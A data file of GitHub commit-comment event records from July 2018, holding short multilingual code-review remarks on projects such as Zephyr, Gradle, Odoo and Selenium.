{"id":"8015547803","type":"CommitCommentEvent","actor":{"login":"jhedberg"},"repo":{"name":"zephyrproject-rtos/zephyr"},"payload":{"comment":{"id":29826966,"position":8,"line":74,"path":"include/logging/log_msg.h","commit_id":"63817e8a549cf8d73530a98c1caeb80ef575c734","created_at":"2018-07-25T10:20:40Z","updated_at":"2018-07-25T10:20:40Z","author_association":"MEMBER","body":"This will not be portable, since the ordering of bitfields may be different across different architectures. I'd suggest to move completely to helper macros both for constructing the u32_t value as well as for decoding it. E.g:\r\n\r\n```\r\n#define LOG_MSG_LEVEL_GET(id) (((id) >> 13) & 0x07)\r\n```"}},"created_at":"2018-07-25T10:20:40Z"}
{"id":"8015548125","type":"CommitCommentEvent","actor":{"login":"giuseppe-santoro"},"repo":{"name":"apuliasoft/onboarding.developers.italia.it"},"payload":{"comment":{"id":29826968,"position":15,"line":28,"path":"src/registered.js","commit_id":"4379c3859ae31ac136db4d999f73e4436e025c06","created_at":"2018-07-25T10:20:45Z","updated_at":"2018-07-25T10:20:45Z","author_association":"NONE","body":"le stringe dovrebbero avere il singolo apice ' invece dei doppi apici \""}},"created_at":"2018-07-25T10:20:45Z"}
{"id":"8015548327","type":"CommitCommentEvent","actor":{"login":"Dasc3er"},"repo":{"name":"devcode-it/openstamanager"},"payload":{"comment":{"id":29826971,"position":9,"line":69,"path":"modules/smtp/actions.php","commit_id":"6315861a07e174984e5b81e07d3232505128b5c7","created_at":"2018-07-25T10:20:47Z","updated_at":"2018-07-25T10:20:47Z","author_association":"CONTRIBUTOR","body":"@lucasalva87 Perché il casting ad array?"}},"created_at":"2018-07-25T10:20:47Z"}
{"id":"8015549282","type":"CommitCommentEvent","actor":{"login":"giuseppe-santoro"},"repo":{"name":"apuliasoft/onboarding.developers.italia.it"},"payload":{"comment":{"id":29826973,"position":91,"line":132,"path":"src/email-sent.js","commit_id":"cb05269b08bb84f3f5efdf2b63e3ae2f2807de81","created_at":"2018-07-25T10:20:59Z","updated_at":"2018-07-25T10:20:59Z","author_association":"NONE","body":"le stringe dovrebbero avere il singolo apice ' invece dei doppi apici \""}},"created_at":"2018-07-25T10:20:59Z"}
{"id":"8015549700","type":"CommitCommentEvent","actor":{"login":"giuseppe-santoro"},"repo":{"name":"apuliasoft/onboarding.developers.italia.it"},"payload":{"comment":{"id":29826974,"position":63,"line":104,"path":"src/email-sent.js","commit_id":"cb05269b08bb84f3f5efdf2b63e3ae2f2807de81","created_at":"2018-07-25T10:21:04Z","updated_at":"2018-07-25T10:21:04Z","author_association":"NONE","body":"le stringe dovrebbero avere il singolo apice ' invece dei doppi apici \""}},"created_at":"2018-07-25T10:21:04Z"}
{"id":"8015553117","type":"CommitCommentEvent","actor":{"login":"Military-Doctor"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29826982,"position":5,"line":5,"path":"templates/dashboard/declaration/buildings.html","commit_id":"a05385b786ed615dfc681082a0a1d90a18f64930","created_at":"2018-07-25T10:21:48Z","updated_at":"2018-07-25T10:21:48Z","author_association":"OWNER","body":"反复点击，会出现BUG"}},"created_at":"2018-07-25T10:21:48Z"}
{"id":"8015553833","type":"CommitCommentEvent","actor":{"login":"cryptokgub"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29826984,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T10:21:57Z","updated_at":"2018-07-25T10:21:57Z","author_association":"NONE","body":"good project\r\n"}},"created_at":"2018-07-25T10:21:57Z"}
{"id":"8015560841","type":"CommitCommentEvent","actor":{"login":"carmenmacwilliams"},"repo":{"name":"carmenmacwilliams/Hello-world"},"payload":{"comment":{"id":29827011,"position":null,"line":null,"path":null,"commit_id":"cc4af16228fee4e220dc30cc3d8c7a33eaed4ea3","created_at":"2018-07-25T10:23:25Z","updated_at":"2018-07-25T10:23:25Z","author_association":"OWNER","body":"I want to create with open source AR Tools the Image from Chagall \" La Promenade\" with a real man Walking and a virtual Woman flying and touching his Hand.  I also want to add a Sound track. I try to find the best tool for it"}},"created_at":"2018-07-25T10:23:25Z"}
{"id":"8015563957","type":"CommitCommentEvent","actor":{"login":"arijitlaik"},"repo":{"name":"rbeucher/UWGeodynamics"},"payload":{"comment":{"id":29827015,"position":null,"line":null,"path":null,"commit_id":"a1749cddf3936bcf5e121b4645c0f7bf05f2065f","created_at":"2018-07-25T10:24:05Z","updated_at":"2018-07-25T10:24:05Z","author_association":"CONTRIBUTOR","body":"Yup. I know that. I tried vep models with the UW in progress example. Cool.\n:)\n\nOn Wed 25 Jul, 2018, 15:42 rbeucher, <notifications@github.com> wrote:\n\n> That works for relatively small deformation of the surface. It won't for\n> your models... I have another trick coming... Small steps\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rbeucher/UWGeodynamics/commit/a1749cddf3936bcf5e121b4645c0f7bf05f2065f#commitcomment-29826864>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJr8QYUgIyKchGt7I49uCTi6TWbmiyM8ks5uKESOgaJpZM4VfoYb>\n> .\n>\n"}},"created_at":"2018-07-25T10:24:05Z"}
{"id":"8015591546","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29827063,"position":null,"line":null,"path":null,"commit_id":"81ac1552d880c8633b8da98c4fe82fbd27a21ffd","created_at":"2018-07-25T10:29:44Z","updated_at":"2018-07-25T10:29:44Z","author_association":"NONE","body":"I must say \"very good idea\" ;-)\r\nif the enemy pawn blocks a check, then it's probably more valuable than a normal pawn.\r\nMoreover when capturing it, this either results into a direct check or our minor piece is then protected by one of our slider-pieces. This are all arguments to extra boost such threats, GL."}},"created_at":"2018-07-25T10:29:44Z"}
{"id":"8015592320","type":"CommitCommentEvent","actor":{"login":"dheerajnambr"},"repo":{"name":"aws-quickstart/quickstart-mongodb"},"payload":{"comment":{"id":29827065,"position":null,"line":null,"path":null,"commit_id":"ec884f0cfa66f0d5ace7a84dbf2d6be8ea8eda87","created_at":"2018-07-25T10:29:53Z","updated_at":"2018-07-25T10:29:53Z","author_association":"NONE","body":"Hi Could you please help me to understand orchestrator.sh script ?. What exactly does the dynamodb table does in those script ?"}},"created_at":"2018-07-25T10:29:53Z"}
{"id":"8015598136","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29827084,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-25T10:31:05Z","updated_at":"2018-07-25T10:31:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T10:31:05Z"}
{"id":"8015603607","type":"CommitCommentEvent","actor":{"login":"Groovounet"},"repo":{"name":"g-truc/glm"},"payload":{"comment":{"id":29827093,"position":null,"line":null,"path":null,"commit_id":"c3c8b73c57a4c987c2890c16a0bb27fe6f3ba04a","created_at":"2018-07-25T10:32:13Z","updated_at":"2018-07-25T10:32:13Z","author_association":"MEMBER","body":"The issue is that the compilers SIMD intrinsics don't support constexpr themselves...\r\n\r\nTo enable constexpr, either disable the generation of SIMD code woth your compiler arguments or define GLM_FORCE_PURE before including GLM."}},"created_at":"2018-07-25T10:32:13Z"}
{"id":"8015603731","type":"CommitCommentEvent","actor":{"login":"pronebird"},"repo":{"name":"Microsoft/reactxp"},"payload":{"comment":{"id":29827094,"position":null,"line":null,"path":null,"commit_id":"2f783b8d8f9e9afe52d00c9cbf4a8bc2a2288ecc","created_at":"2018-07-25T10:32:15Z","updated_at":"2018-07-25T10:32:15Z","author_association":"NONE","body":"Can anyone explain why `package-lock.json.1497438425` was included in the PR that's been merged to master?"}},"created_at":"2018-07-25T10:32:15Z"}
{"id":"8015603792","type":"CommitCommentEvent","actor":{"login":"Groovounet"},"repo":{"name":"g-truc/glm"},"payload":{"comment":{"id":29827095,"position":null,"line":null,"path":null,"commit_id":"c3c8b73c57a4c987c2890c16a0bb27fe6f3ba04a","created_at":"2018-07-25T10:32:16Z","updated_at":"2018-07-25T10:32:16Z","author_association":"MEMBER","body":"The issue is that the compilers SIMD intrinsics don't support constexpr themselves...\r\n\r\nTo enable constexpr, either disable the generation of SIMD code woth your compiler arguments or define GLM_FORCE_PURE before including GLM."}},"created_at":"2018-07-25T10:32:16Z"}
{"id":"8015606193","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29827099,"position":17,"line":22,"path":"app/models.py","commit_id":"7473eb48b733b9fd12592895f483e1e1bb26e2d1","created_at":"2018-07-25T10:32:48Z","updated_at":"2018-07-25T10:32:48Z","author_association":"NONE","body":"user.save(using=self._db)\r\nЭто все таки надо добавить"}},"created_at":"2018-07-25T10:32:48Z"}
{"id":"8015609437","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29827110,"position":221,"line":169,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-25T10:33:29Z","updated_at":"2018-07-25T10:33:29Z","author_association":"CONTRIBUTOR","body":"I'm beginning to think that I simply don't like the font. Its kerning seems pretty awful. In other words, I think I would prefer a better font that hacking some extra space around the API links :smile:\r\n\r\nActually, thinking about it, I like the main font. It's the monospace font that doesn't work for me, and more importantly, I don't think it works well mixed in with Lato. I notice that the `font-family` is just `monospace`. I suggest using a named font that's more appropriate."}},"created_at":"2018-07-25T10:33:29Z"}
{"id":"8015610309","type":"CommitCommentEvent","actor":{"login":"oleksandrpaziuk"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29827113,"position":28,"line":84,"path":"addons/stock/report/report_stockpicking_operations.xml","commit_id":"f6144fe1f36ad44affff785d0e9c2c32d37a8963","created_at":"2018-07-25T10:33:40Z","updated_at":"2018-07-25T10:33:40Z","author_association":"NONE","body":"Please check (print|test) before merging!\r\nHere we always add `<th width=\"20%\" class=\"text-center\">` dispite of `<t t-if=\"has_barcode\">Barcode</t>` have value or not.\r\nSame for next 3 `th`!"}},"created_at":"2018-07-25T10:33:40Z"}
{"id":"8015610398","type":"CommitCommentEvent","actor":{"login":"Chinaanil"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29827114,"position":null,"line":null,"path":null,"commit_id":"afc81c1855bf711315b8e5de02db138d3d487eeb","created_at":"2018-07-25T10:33:41Z","updated_at":"2018-07-25T10:33:41Z","author_association":"NONE","body":"hbd swift\r\n"}},"created_at":"2018-07-25T10:33:41Z"}
{"id":"8015612256","type":"CommitCommentEvent","actor":{"login":"jpmeijers"},"repo":{"name":"jpmeijers/ttn-resin-gateway-rpi"},"payload":{"comment":{"id":29827116,"position":null,"line":null,"path":null,"commit_id":"38ef832c01b614e8f04613cc4eb03093c88ec51e","created_at":"2018-07-25T10:34:06Z","updated_at":"2018-07-25T10:34:06Z","author_association":"OWNER","body":"Fixed"}},"created_at":"2018-07-25T10:34:06Z"}
{"id":"8015615927","type":"CommitCommentEvent","actor":{"login":"trblackw"},"repo":{"name":"trblackw/RedditPostGrabber"},"payload":{"comment":{"id":29827121,"position":null,"line":null,"path":null,"commit_id":"139dc12c76f35a562e68cc6313ae1b5724b8ba1c","created_at":"2018-07-25T10:34:52Z","updated_at":"2018-07-25T10:34:52Z","author_association":"OWNER","body":"Awesome! Thanks, friend. I’ll take a closer look this afternoon when I get off work. "}},"created_at":"2018-07-25T10:34:52Z"}
{"id":"8015621914","type":"CommitCommentEvent","actor":{"login":"phamxuandat"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29827129,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T10:36:11Z","updated_at":"2018-07-25T10:36:11Z","author_association":"NONE","body":"Goodproject"}},"created_at":"2018-07-25T10:36:11Z"}
{"id":"8015629258","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29827140,"position":24,"line":30,"path":"free/urls.py","commit_id":"7473eb48b733b9fd12592895f483e1e1bb26e2d1","created_at":"2018-07-25T10:37:49Z","updated_at":"2018-07-25T10:37:49Z","author_association":"NONE","body":"смотри, это надо сделать через rest_framework router. Он все сделает b detail(retrieve), List,"}},"created_at":"2018-07-25T10:37:49Z"}
{"id":"8015634200","type":"CommitCommentEvent","actor":{"login":"IMM0rtalis"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":29827143,"position":null,"line":null,"path":null,"commit_id":"6b71fd0bcbf9cc00ed4076587f5692b72f6e9aa5","created_at":"2018-07-25T10:38:56Z","updated_at":"2018-07-25T10:38:56Z","author_association":"NONE","body":"This is happening again, could it be? in 5.2.0 it is `\"table\": \"^4.0.3\",`"}},"created_at":"2018-07-25T10:38:56Z"}
{"id":"8015634254","type":"CommitCommentEvent","actor":{"login":"expez"},"repo":{"name":"clojure-emacs/clj-refactor.el"},"payload":{"comment":{"id":29827144,"position":null,"line":null,"path":null,"commit_id":"a0a1e19b442a912d8355c03fa076fdea747513c1","created_at":"2018-07-25T10:38:56Z","updated_at":"2018-07-25T10:38:56Z","author_association":"MEMBER","body":"@bbatsov This really blows, but I can't think of another way to get the build to succeed again.  \r\n\r\nAm I missing something?"}},"created_at":"2018-07-25T10:38:56Z"}
{"id":"8015634866","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29827146,"position":7,"line":7,"path":"order/models.py","commit_id":"7473eb48b733b9fd12592895f483e1e1bb26e2d1","created_at":"2018-07-25T10:39:06Z","updated_at":"2018-07-25T10:39:06Z","author_association":"NONE","body":"добавь статусы. продумай какие могут быть статусы"}},"created_at":"2018-07-25T10:39:06Z"}
{"id":"8015637212","type":"CommitCommentEvent","actor":{"login":"barancev"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29827154,"position":null,"line":null,"path":null,"commit_id":"b6f307c814a55b70a618305bd2b8266056bb2324","created_at":"2018-07-25T10:39:37Z","updated_at":"2018-07-25T10:39:37Z","author_association":"MEMBER","body":"Please note that this change broke EventFiringWebDriverTest. There must be a mis-designed test, but it should be fixed too."}},"created_at":"2018-07-25T10:39:37Z"}
{"id":"8015642627","type":"CommitCommentEvent","actor":{"login":"Alf21"},"repo":{"name":"Tommy228/tttdamagelogs"},"payload":{"comment":{"id":29827162,"position":10,"line":null,"path":"lua/damagelogs/server/init.lua","commit_id":"bf67288630d91fd4be06ed71f5356e2995c24aa1","created_at":"2018-07-25T10:40:47Z","updated_at":"2018-07-25T10:40:47Z","author_association":"CONTRIBUTOR","body":"Found an issue: „local id“ must be defined outside of the if-else-clause to be able to access it"}},"created_at":"2018-07-25T10:40:47Z"}
{"id":"8015644007","type":"CommitCommentEvent","actor":{"login":"WQPG"},"repo":{"name":"EnterpriseDB/zheap"},"payload":{"comment":{"id":29827163,"position":null,"line":null,"path":null,"commit_id":"64f7dcd7dc249f2f9e78e0f1e29aebd95f48a23d","created_at":"2018-07-25T10:41:04Z","updated_at":"2018-07-25T10:41:04Z","author_association":"NONE","body":"/home/postgres/zheap-master/build/../src/backend/commands/zvacuumlazy.c: 在函数‘lazy_vacuum_zpage_with_undo’中:\r\n/home/postgres/zheap-master/build/../src/backend/commands/zvacuumlazy.c:162:15: 警告：变量‘tblk’被设定但未被使用 [-Wunused-but-set-variable]\r\n   BlockNumber tblk;\r\n               ^\r\n/home/postgres/zheap-master/build/../src/backend/access/undo/undorecord.c: 在函数‘UndoRecordAllocateMulti’中:\r\n/home/postgres/zheap-master/build/../src/backend/access/undo/undorecord.c:974:18: 警告：此函数中的‘urec’在使用前可能未初始化 [-Wmaybe-uninitialized]\r\n   urec->uur_info = 0;  /* force recomputation of info bits */\r\n                  ^\r\n/home/postgres/zheap-master/build/../src/backend/access/undo/undoaction.c: 在函数‘execute_undo_actions_page’中:\r\n/home/postgres/zheap-master/build/../src/backend/access/undo/undoaction.c:766:13: 警告：变量‘prev_trans_slot’被设定但未被使用 [-Wunused-but-set-variable]\r\n       int   prev_trans_slot;\r\n             ^\r\n/home/postgres/zheap-master/build/../src/backend/access/zheap/tpdxlog.c: 在函数‘tpd_xlog_allocate_entry’中:\r\n/home/postgres/zheap-master/build/../src/backend/access/zheap/tpdxlog.c:57:10: 警告：变量‘offset’被设定但未被使用 [-Wunused-but-set-variable]\r\n   uint16 offset;\r\n          ^\r\n/home/postgres/zheap-master/build/../src/backend/access/zheap/zheapamxlog.c: 在函数‘zheap_xlog_multi_insert’中:\r\n/home/postgres/zheap-master/build/../src/backend/access/zheap/zheapamxlog.c:1397:8: 警告：变量‘prev_trans_slot_id’被设定但未被使用 [-Wunused-but-set-variable]\r\n   int  prev_trans_slot_id;\r\n        ^\r\n/home/postgres/zheap-master/build/../src/backend/utils/time/ztqual.c: 在函数‘GetTupleFromUndoForAbortedXact’中:\r\n/home/postgres/zheap-master/build/../src/backend/utils/time/ztqual.c:338:16: 警告：变量‘prev_undo_xid’被设定但未被使用 [-Wunused-but-set-variable]\r\n  TransactionId prev_undo_xid = InvalidTransactionId,\r\n"}},"created_at":"2018-07-25T10:41:04Z"}
{"id":"8015645182","type":"CommitCommentEvent","actor":{"login":"danpetry"},"repo":{"name":"miri64/RIOT"},"payload":{"comment":{"id":29827164,"position":17,"line":1040,"path":"sys/net/gnrc/network_layer/ipv6/nib/nib.c","commit_id":"c01c8a5ef1458bf50017f0996d15c961d9bebce8","created_at":"2018-07-25T10:41:18Z","updated_at":"2018-07-25T10:41:18Z","author_association":"NONE","body":"Won't this function return `_ADDR_REG_STATUS_IGNORE` if there's no ARO?"}},"created_at":"2018-07-25T10:41:18Z"}
{"id":"8015646088","type":"CommitCommentEvent","actor":{"login":"sprunk"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":29827165,"position":4,"line":62,"path":"LuaUI/Configs/customCmdTypes.lua","commit_id":"3b160d49220f7ef6d847b2e24989f200b2f3bdbc","created_at":"2018-07-25T10:41:30Z","updated_at":"2018-07-25T10:41:30Z","author_association":"MEMBER","body":"I believe it's caused by this\r\n\r\nhttps://github.com/ZeroK-RTS/Zero-K/blob/3b160d49220f7ef6d847b2e24989f200b2f3bdbc/LuaUI/Configs/customCmdTypes.lua#L194-L199"}},"created_at":"2018-07-25T10:41:30Z"}
{"id":"8015646678","type":"CommitCommentEvent","actor":{"login":"nandubatchu"},"repo":{"name":"apiaryio/dredd"},"payload":{"comment":{"id":29827168,"position":46,"line":46,"path":"docs/usage-cli.md","commit_id":"7bffde7be6fcaf7c96cf114751dc5fde02b86ac4","created_at":"2018-07-25T10:41:38Z","updated_at":"2018-07-25T10:41:38Z","author_association":"NONE","body":"So accessing the dredd config is not possible in other language (except JS)?"}},"created_at":"2018-07-25T10:41:38Z"}
{"id":"8015648269","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29827172,"position":21,"line":14,"path":"order/serializers.py","commit_id":"7473eb48b733b9fd12592895f483e1e1bb26e2d1","created_at":"2018-07-25T10:42:00Z","updated_at":"2018-07-25T10:42:00Z","author_association":"NONE","body":"Это не правильно. create метод в serializer принимает validated_data. И возвращает объект"}},"created_at":"2018-07-25T10:42:00Z"}
{"id":"8015650033","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29827176,"position":221,"line":169,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-25T10:42:23Z","updated_at":"2018-07-25T10:42:23Z","author_association":"CONTRIBUTOR","body":"Maybe try [Inconsolata](https://fonts.google.com/specimen/Inconsolata)?"}},"created_at":"2018-07-25T10:42:23Z"}
{"id":"8015653868","type":"CommitCommentEvent","actor":{"login":"kristalls"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29827185,"position":16,"line":16,"path":"lesson2/buyers_list.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-25T10:43:13Z","updated_at":"2018-07-25T10:43:13Z","author_association":"OWNER","body":"Работает только с хэш рокет почему то."}},"created_at":"2018-07-25T10:43:13Z"}
{"id":"8015656967","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29827191,"position":28,"line":21,"path":"order/serializers.py","commit_id":"7473eb48b733b9fd12592895f483e1e1bb26e2d1","created_at":"2018-07-25T10:43:53Z","updated_at":"2018-07-25T10:43:53Z","author_association":"NONE","body":"Это можно вынести в __init__. \r\nself.user = "}},"created_at":"2018-07-25T10:43:53Z"}
{"id":"8015660104","type":"CommitCommentEvent","actor":{"login":"Soumil07"},"repo":{"name":"dirigeants/klasa-pieces"},"payload":{"comment":{"id":29827198,"position":8,"line":8,"path":"extendables/checkChatForImage.js","commit_id":"a16c753b0789a21ddb4256923bafe077748f9737","created_at":"2018-07-25T10:44:34Z","updated_at":"2018-07-25T10:44:34Z","author_association":"CONTRIBUTOR","body":"this defaults to true "}},"created_at":"2018-07-25T10:44:34Z"}
{"id":"8015661111","type":"CommitCommentEvent","actor":{"login":"giuseppe-santoro"},"repo":{"name":"apuliasoft/onboarding.developers.italia.it"},"payload":{"comment":{"id":29827200,"position":1,"line":1,"path":"src/tpl/layout.html","commit_id":"4379c3859ae31ac136db4d999f73e4436e025c06","created_at":"2018-07-25T10:44:46Z","updated_at":"2018-07-25T10:44:46Z","author_association":"NONE","body":"Questo file sembra non essere utilizzato da nessuna parte."}},"created_at":"2018-07-25T10:44:46Z"}
{"id":"8015665967","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29827210,"position":1,"line":1,"path":"order/urls.py","commit_id":"7473eb48b733b9fd12592895f483e1e1bb26e2d1","created_at":"2018-07-25T10:45:50Z","updated_at":"2018-07-25T10:45:50Z","author_association":"NONE","body":"это можно убрать все"}},"created_at":"2018-07-25T10:45:50Z"}
{"id":"8015667280","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/trezor-agent"},"payload":{"comment":{"id":29827213,"position":null,"line":null,"path":null,"commit_id":"eed168341c71a8f4790b47f7bfc146c173826a8f","created_at":"2018-07-25T10:46:08Z","updated_at":"2018-07-25T10:46:08Z","author_association":"OWNER","body":"```\r\n$ find libagent -name '*.py' | xargs sed -i 's/(object)//g'\r\n```"}},"created_at":"2018-07-25T10:46:08Z"}
{"id":"8015669388","type":"CommitCommentEvent","actor":{"login":"sprunk"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":29827215,"position":39,"line":39,"path":"LuaUI/Widgets/gui_missile_select.lua","commit_id":"3b160d49220f7ef6d847b2e24989f200b2f3bdbc","created_at":"2018-07-25T10:46:38Z","updated_at":"2018-07-25T10:46:38Z","author_association":"MEMBER","body":"\"Close to\"? Can this select a missile from an adjacent silo? I think it should only select the silo's own missiles in which case the wording should probably be something like `Select this silo's missiles`."}},"created_at":"2018-07-25T10:46:38Z"}
{"id":"8015670191","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/meikaijava"},"payload":{"comment":{"id":29827218,"position":128,"line":105,"path":"e_16/src/e_16_2/e_16_2.java","commit_id":"7858fa03cf77bf2ed05337cb4886b479e3546773","created_at":"2018-07-25T10:46:50Z","updated_at":"2018-07-25T10:46:50Z","author_association":"COLLABORATOR","body":"柴田\r\nエラーが発生した時ストリームはどうなりますか？\r\n確認して修正してください。"}},"created_at":"2018-07-25T10:46:50Z"}
{"id":"8015672884","type":"CommitCommentEvent","actor":{"login":"honzajavorek"},"repo":{"name":"apiaryio/dredd"},"payload":{"comment":{"id":29827223,"position":46,"line":46,"path":"docs/usage-cli.md","commit_id":"7bffde7be6fcaf7c96cf114751dc5fde02b86ac4","created_at":"2018-07-25T10:47:25Z","updated_at":"2018-07-25T10:47:25Z","author_association":"MEMBER","body":"I'd say no, at the moment. The TCP protocol between hooks and Dredd isn't ready for this. You could, of course, overcome the limitation by loading the yml config as YAML file in the target language and getting the values from there :)"}},"created_at":"2018-07-25T10:47:25Z"}
{"id":"8015684936","type":"CommitCommentEvent","actor":{"login":"chiselwright"},"repo":{"name":"jenkinsci/gitlab-plugin"},"payload":{"comment":{"id":29827242,"position":null,"line":null,"path":null,"commit_id":"2e14cb5c6e18945ac240928af0e5a8d6579f2f32","created_at":"2018-07-25T10:50:09Z","updated_at":"2018-07-25T10:50:09Z","author_association":"NONE","body":"> Fix so that gitlabCommitStatus does not require a 'name' parameter.\r\n\r\nThis does not appear to be true, as this morning after upgrading all out pipelines started failing.\r\n\r\nThey have been using:\r\n\r\n    gitlabCommitStatus('Foo')\r\n\r\nand I had to update all calls to\r\n\r\n    gitlabCommitStatus(name:'Foo')\r\n\r\nfor the pipeline to stop failing."}},"created_at":"2018-07-25T10:50:09Z"}
{"id":"8015692295","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/meikaijava"},"payload":{"comment":{"id":29827258,"position":17,"line":13,"path":"e_16/src/e_16_2/e_16_2.java","commit_id":"7858fa03cf77bf2ed05337cb4886b479e3546773","created_at":"2018-07-25T10:51:44Z","updated_at":"2018-07-25T10:51:44Z","author_association":"COLLABORATOR","body":"柴田\r\nこれは抽象クラスではありません。\r\n何故かを確認し、コメントの修正をお願いします。"}},"created_at":"2018-07-25T10:51:44Z"}
{"id":"8015692905","type":"CommitCommentEvent","actor":{"login":"sprunk"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":29827261,"position":71,"line":71,"path":"LuaUI/Widgets/gui_missile_select.lua","commit_id":"3b160d49220f7ef6d847b2e24989f200b2f3bdbc","created_at":"2018-07-25T10:51:54Z","updated_at":"2018-07-25T10:51:54Z","author_association":"MEMBER","body":"Could probably be optimized not to do a search. A missile silo knows who its children are, they could be exposed (here https://github.com/ZeroK-RTS/Zero-K/blob/master/LuaRules/Gadgets/unit_missilesilo.lua#L188 https://github.com/ZeroK-RTS/Zero-K/blob/master/LuaRules/Gadgets/unit_missilesilo.lua#L211 ) and then the search could be replaced by just adding these IDs directly."}},"created_at":"2018-07-25T10:51:54Z"}
{"id":"8015696309","type":"CommitCommentEvent","actor":{"login":"matukaa"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29827269,"position":null,"line":null,"path":null,"commit_id":"aab605b9448a24d03287f512a5fe28adb1b54963","created_at":"2018-07-25T10:52:40Z","updated_at":"2018-07-25T10:52:40Z","author_association":"NONE","body":"If you want to do it blizzlike, apply https://www.wowdb.com/spells/208166-ray-of-frost on the first cast. It will let you cast it even while on cooldown for the first 10 seconds, as it is on Retail"}},"created_at":"2018-07-25T10:52:40Z"}
{"id":"8015696596","type":"CommitCommentEvent","actor":{"login":"chiselwright"},"repo":{"name":"jenkinsci/gitlab-plugin"},"payload":{"comment":{"id":29827271,"position":null,"line":null,"path":null,"commit_id":"2e14cb5c6e18945ac240928af0e5a8d6579f2f32","created_at":"2018-07-25T10:52:44Z","updated_at":"2018-07-25T10:52:44Z","author_association":"NONE","body":"Also, #813 "}},"created_at":"2018-07-25T10:52:44Z"}
{"id":"8015704693","type":"CommitCommentEvent","actor":{"login":"WebReflection"},"repo":{"name":"WebReflection/ascjs"},"payload":{"comment":{"id":29827289,"position":11,"line":183,"path":"index.js","commit_id":"3240ef9a171b114e39b747adbd30642f7a5f725b","created_at":"2018-07-25T10:54:30Z","updated_at":"2018-07-25T10:54:30Z","author_association":"OWNER","body":"a) irrelevant, since it's not breaking, or changing, any behavior.\r\nb) ESM are always use strict, this project is about transforming ESM to CJS. Use the ignore flag to avoid parsing CJS\r\nc) require in ESM can be anything, and I don't want, neither I have time, overcomplicate the parsing logic.\r\n\r\nThis is the best I could do, and you have various ways to work around CJS files, including using other tools if this is not good enough 😉 "}},"created_at":"2018-07-25T10:54:30Z"}
{"id":"8015708240","type":"CommitCommentEvent","actor":{"login":"initialed85"},"repo":{"name":"ftpsolutions/gosnmp"},"payload":{"comment":{"id":29827295,"position":null,"line":null,"path":null,"commit_id":"765c3862d22d9cffa1052a4626da2bbfb1355126","created_at":"2018-07-25T10:55:16Z","updated_at":"2018-07-25T10:55:16Z","author_association":"NONE","body":"And of course- no unit tests!\r\n\r\nIt's what the people have come to except, it's what the people want!"}},"created_at":"2018-07-25T10:55:16Z"}
